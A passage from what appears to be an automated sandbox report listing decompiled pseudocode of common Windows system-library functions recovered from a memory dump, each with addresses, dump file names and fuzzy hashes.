				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x531d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0522CC50(_t86);
					L11:
					return E0526B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x5318504
				E05242280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0526FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0526B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L05244620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0522CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x5318504
								E0523FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E05254F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x05254bad
0x05254bbf
0x05254bc2
0x05254bc6
0x05254bcd
0x05254bd9
0x052967fe
0x05296800
0x05254ccc
0x05254ccd
0x05254cb7
0x05254cc9
0x05254cc9
0x05254bdf
0x05254be5
0x00000000
0x00000000
0x05254beb
0x05254bef
0x00000000
0x00000000
0x05254bf5
0x05254bf9
0x05254c06
0x05254c0b
0x05254c17
0x05254c1c
0x05254c1f
0x05254c25
0x05254c33
0x05254c3d
0x05254c40
0x05254c43
0x05254c47
0x05254c4d
0x05254c53
0x05254c54
0x05254c55
0x05254c56
0x05254c5b
0x05254c5c
0x05254c63
0x05254c6b
0x00000000
0x00000000
0x05296776
0x05296784
0x05296784
0x0529679f
0x052967a7
0x052967af
0x052967ce
0x00000000
0x052967b1
0x052967b7
0x052967b8
0x052967c1
0x052967d3
0x052967d9
0x052967dd
0x05254c94
0x05254c94
0x05254c98
0x05254c9c
0x05254ca3
0x052967f4
0x052967f4
0x05254cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x05254cb5
0x05254c79
0x05254c7e
0x05254c89
0x05254c8b
0x05254c8f
0x05254c8f
0x00000000
0x05254c89
0x052967c3
0x00000000
0x052967c3
0x052967af
0x05254c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39201cb6c686ff1d2b7483c5a2ee57fc9eb59264622f434a05fc47c5b73fd541
Instruction ID: 5a7519cab68f08f8eaf96e57b62da8588d429cc4dc414942fddda91b57f1efe1
Opcode Fuzzy Hash: 39201cb6c686ff1d2b7483c5a2ee57fc9eb59264622f434a05fc47c5b73fd541
Instruction Fuzzy Hash: B041A336A202299BCF24EF64C944FEAB7B5FF45710F4104A5E909AB340DB74AE80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05238A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05238A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x531d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0526B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0523E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5201180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E05251DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E05263C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E05238999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x05238a0a
0x05238a1c
0x05238a23
0x05238a2e
0x05238a30
0x05238a36
0x05238a3c
0x05238a3e
0x05238a4a
0x05238a52
0x05238a9c
0x05238aae
0x05238a58
0x05238a5e
0x05238a6a
0x05238a6f
0x05238a75
0x05238a7d
0x05238a85
0x05238a86
0x05238a89
0x05238a93
0x05238a99
0x05238a9b
0x00000000
0x05238aaf
0x05238abe
0x05238ac3
0x05238acb
0x05238ad7
0x05238ae0
0x05238af1
0x00000000
0x05238af1
0x05238acd
0x05238ad5
0x05238afb
0x05238afd
0x05238aff
0x05238b07
0x05238b22
0x05238b24
0x05238b2a
0x05238b2e
0x05238b3f
0x05238b78
0x05238b41
0x05238b52
0x05238b54
0x05238b5c
0x05238b74
0x05238b74
0x05238b5c
0x05238b3f
0x05238b5e
0x05238b61
0x05238b64
0x05238b64
0x05238b6c
0x05238b6c
0x05238b11
0x05289cd5
0x05289cd5
0x05238b17
0x05238b1a
0x05238b1a
0x00000000
0x05238ad5
0x05238a89

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d029182472ca51e90db8e9560e55a1762e84f3648d1389c22f82edde491a1dea
Instruction ID: d65364396d0c16c561660fbfd4fdf835185a07e79f6f3615ea74af5a01bc8184
Opcode Fuzzy Hash: d029182472ca51e90db8e9560e55a1762e84f3648d1389c22f82edde491a1dea
Instruction Fuzzy Hash: 52415CF1A122299BDB24CF55C889AB9B7B9FF44300F1045EAE819DB241EB709E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 052A69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E052A69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x531d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L05236C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E052A6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E05269980() >= 0) {
							E05242280(_t56, 0x5318778);
							_t77 = 1;
							_t68 = 1;
							if( *0x5318774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x5318774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0522B6F0(0x520c338, 0x520c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E05269520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E052695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0523FFB0(_t68, _t77, 0x5318778);
				}
				_pop(_t78);
				return E0526B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x052a69b5
0x052a69be
0x052a69c3
0x052a69c9
0x052a69cc
0x052a69d1
0x052a69d3
0x052a69de
0x052a69e1
0x052a69ea
0x052a69f6
0x052a69fe
0x052a6a13
0x052a6a14
0x052a6a15
0x052a6a16
0x052a6a1e
0x052a6a26
0x052a6a31
0x052a6a36
0x052a6a37
0x052a6a40
0x052a6a49
0x052a6a4a
0x052a6a53
0x052a6a59
0x052a6a5d
0x052a6a5e
0x052a6a64
0x052a6a67
0x052a6a6a
0x052a6a6d
0x052a6a70
0x052a6a77
0x052a6a7d
0x052a6a86
0x052a6a89
0x052a6a9c
0x052a6a9f
0x052a6aa2
0x052a6aa5
0x052a6aaf
0x052a6ab1
0x052a6ab8
0x052a6ab9
0x052a6abb
0x052a6abe
0x052a6ac5
0x052a6ac5
0x052a6aaf
0x052a6a40
0x052a6a26
0x052a69fe
0x052a6ace
0x052a6ad0
0x052a6ad3
0x052a6ad8
0x052a6adf
0x052a6adf
0x052a6ae8
0x052a6aef
0x052a6aef
0x052a6af9
0x052a6b06

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31d9e3e13b10bea64bbe3b791083ff4e48c03a69c353c5365b90e029e3c0eec
Instruction ID: 388ac13bc8110ad1279ddd3d03f4c7af0f3ff9f07af713de26e4f50a10ea594d
Opcode Fuzzy Hash: a31d9e3e13b10bea64bbe3b791083ff4e48c03a69c353c5365b90e029e3c0eec
Instruction Fuzzy Hash: 2B4180B1E112089FDB14CFA5C944BBDFBF4FF48304F14852AE815A7241DB306905CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05225210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E05225210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E052252A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E052695D0();
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0523EB70(_t54, 0x53179a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E052695D0();
								L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0523EB70(_t54, 0x53179a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0526F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0523EB70(_t54, 0x53179a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E052695D0();
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x05225220
0x05225224
0x05280d13
0x05280d16
0x05280d19
0x0522522a
0x0522522a
0x0522522d
0x0522522d
0x05225231
0x05225235
0x05225239
0x05280d5c
0x05280d62
0x00000000
0x00000000
0x05280d6a
0x05280d7b
0x05280d7f
0x05280d81
0x05280d84
0x05280d95
0x05280d95
0x05280d6c
0x05280d71
0x05280d71
0x05280d9a
0x00000000
0x0522524a
0x0522524a
0x05225250
0x05280d24
0x05280d35
0x05280d39
0x05280d3b
0x05280d3e
0x05280d50
0x05280d50
0x05280d26
0x05280d2b
0x05280d2b
0x00000000
0x05280d55
0x05225256
0x0522525b
0x05225265
0x05280da7
0x0522526b
0x0522526e
0x05225272
0x05280db1
0x05280db4
0x05280dc5
0x05280dc5
0x05225272
0x05225278
0x0522527e
0x0522528a
0x0522528c
0x0522528d
0x00000000
0x05225280
0x05225282
0x05225288
0x0522529f
0x05225292
0x00000000
0x05225292
0x00000000
0x05225288
0x0522527e

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e23fdbe37096ad92f41db9cff5c8e320416ea7ed89ab122e88a9dd69b0ec793
Instruction ID: fdb94370761de4210a1fbd4476d4f9023835611e5b76aacc5f6f83ea310d378f
Opcode Fuzzy Hash: 8e23fdbe37096ad92f41db9cff5c8e320416ea7ed89ab122e88a9dd69b0ec793
Instruction Fuzzy Hash: CC310835776611EBC736AB68C849F7677AAFF00760F15871AE81A0B1D0DB70F848CA90

Uniqueness

Uniqueness Score: -1.00%

Function 05263D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05263D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E05237B60(0, _t61, 0x52011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E05237B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L05244620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x05263d4c
0x05263d50
0x05263d55
0x05263d5e
0x0529e79a
0x00000000
0x0529e79a
0x05263d68
0x0529e789
0x05263d9d
0x05263da3
0x05263daf
0x05263db5
0x05263dbc
0x05263dc4
0x05263dc9
0x05263dce
0x0529e7ae
0x0529e7ae
0x05263dde
0x05263de2
0x05263de7
0x05263e0d
0x05263e13
0x05263e16
0x05263e1e
0x05263e25
0x05263e28
0x00000000
0x00000000
0x05263e2a
0x05263e2f
0x05263e37
0x05263e37
0x00000000
0x05263e37
0x05263e31
0x00000000
0x05263e31
0x05263e20
0x05263e20
0x05263e35
0x00000000
0x05263de9
0x05263de9
0x05263de9
0x05263dee
0x05263dfd
0x05263dff
0x05263e02
0x05263e05
0x05263e05
0x00000000
0x05263df0
0x05263de7
0x0529e78f
0x0529e794
0x05263d79
0x05263d84
0x05263d89
0x05263d8e
0x00000000
0x0529e7a4
0x05263d96
0x05263d9a
0x00000000
0x05263d9a
0x00000000
0x0529e794
0x05263d6e
0x05263d73
0x00000000
0x0529e7b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5debdfb430e82ed84c70ccd48a093eaabe1d90efd8c7f496fd76a553c87ebcc4
Instruction ID: c55d14c9299bb4d3c2a6e68f3657c374d496cabb8ac5eec305d48223a54db472
Opcode Fuzzy Hash: 5debdfb430e82ed84c70ccd48a093eaabe1d90efd8c7f496fd76a553c87ebcc4
Instruction Fuzzy Hash: 9531B475625615DBDB28CF29C841A7BBBF6FF65700705886EE84ACB350E770D880C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0525A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0525A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5300220);
				E0527D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5317b9c; // 0x0
				_t55 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0527D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5317b10 =  *0x5317b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x531536c; // 0x114ac10
					if( *_t51 != 0x5315368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5315368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x531536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0525A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0525a61c
0x0525a61e
0x0525a623
0x0525a628
0x0525a62b
0x0525a62d
0x0525a648
0x0525a64a
0x0525a64f
0x05299b44
0x0525a6ec
0x0525a6f1
0x0525a6f1
0x0525a655
0x0525a657
0x0525a65a
0x0525a65d
0x0525a662
0x0525a663
0x0525a667
0x0525a668
0x0525a66d
0x0525a706
0x0525a706
0x05299bda
0x05299be6
0x05299beb
0x00000000
0x05299beb
0x0525a679
0x05299b7a
0x00000000
0x05299b7a
0x0525a683
0x0525a6f4
0x0525a6f7
0x0525a6f9
0x0525a6fd
0x0525a6a0
0x0525a6a0
0x0525a6ad
0x0525a6af
0x0525a6b4
0x05299ba7
0x05299bac
0x00000000
0x00000000
0x05299bc6
0x05299bce
0x05299bd1
0x05299bd3
0x05299bd3
0x00000000
0x05299bd1
0x0525a6bd
0x0525a6c3
0x0525a6c6
0x0525a6d2
0x0525a701
0x0525a704
0x00000000
0x0525a704
0x0525a6d4
0x0525a6d6
0x0525a6d9
0x0525a6db
0x0525a6e1
0x0525a6e6
0x0525a6e8
0x0525a6e8
0x0525a6ea
0x00000000
0x0525a6ea
0x0525a688
0x0525a692
0x0525a694
0x0525a699
0x00000000
0x00000000
0x0525a69d
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525610f33b5b5fba8b501d37a97f6e422f76d1583d1f2231c1cbc964efeb848e
Instruction ID: def204e8e797c09cbb314b23ae4990c464223f3ec1ac44fbaa50daa4dcb2af56
Opcode Fuzzy Hash: 525610f33b5b5fba8b501d37a97f6e422f76d1583d1f2231c1cbc964efeb848e
Instruction Fuzzy Hash: C24158B5A24205DFCF09CF68D491BA9BBF6BF49321F188169E809AB344C778A941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0524C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0524C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E05247D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E052F8D34(_v8, _t80);
					}
					E05242280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0523FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E052F8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0523FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0526B180();
						if(_a4 != 0) {
							E05242280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0524BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0524BB2D(_t16, _t15);
						E0524B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0523FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0523FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0523FFB0(0, __ecx, _t24);
				}
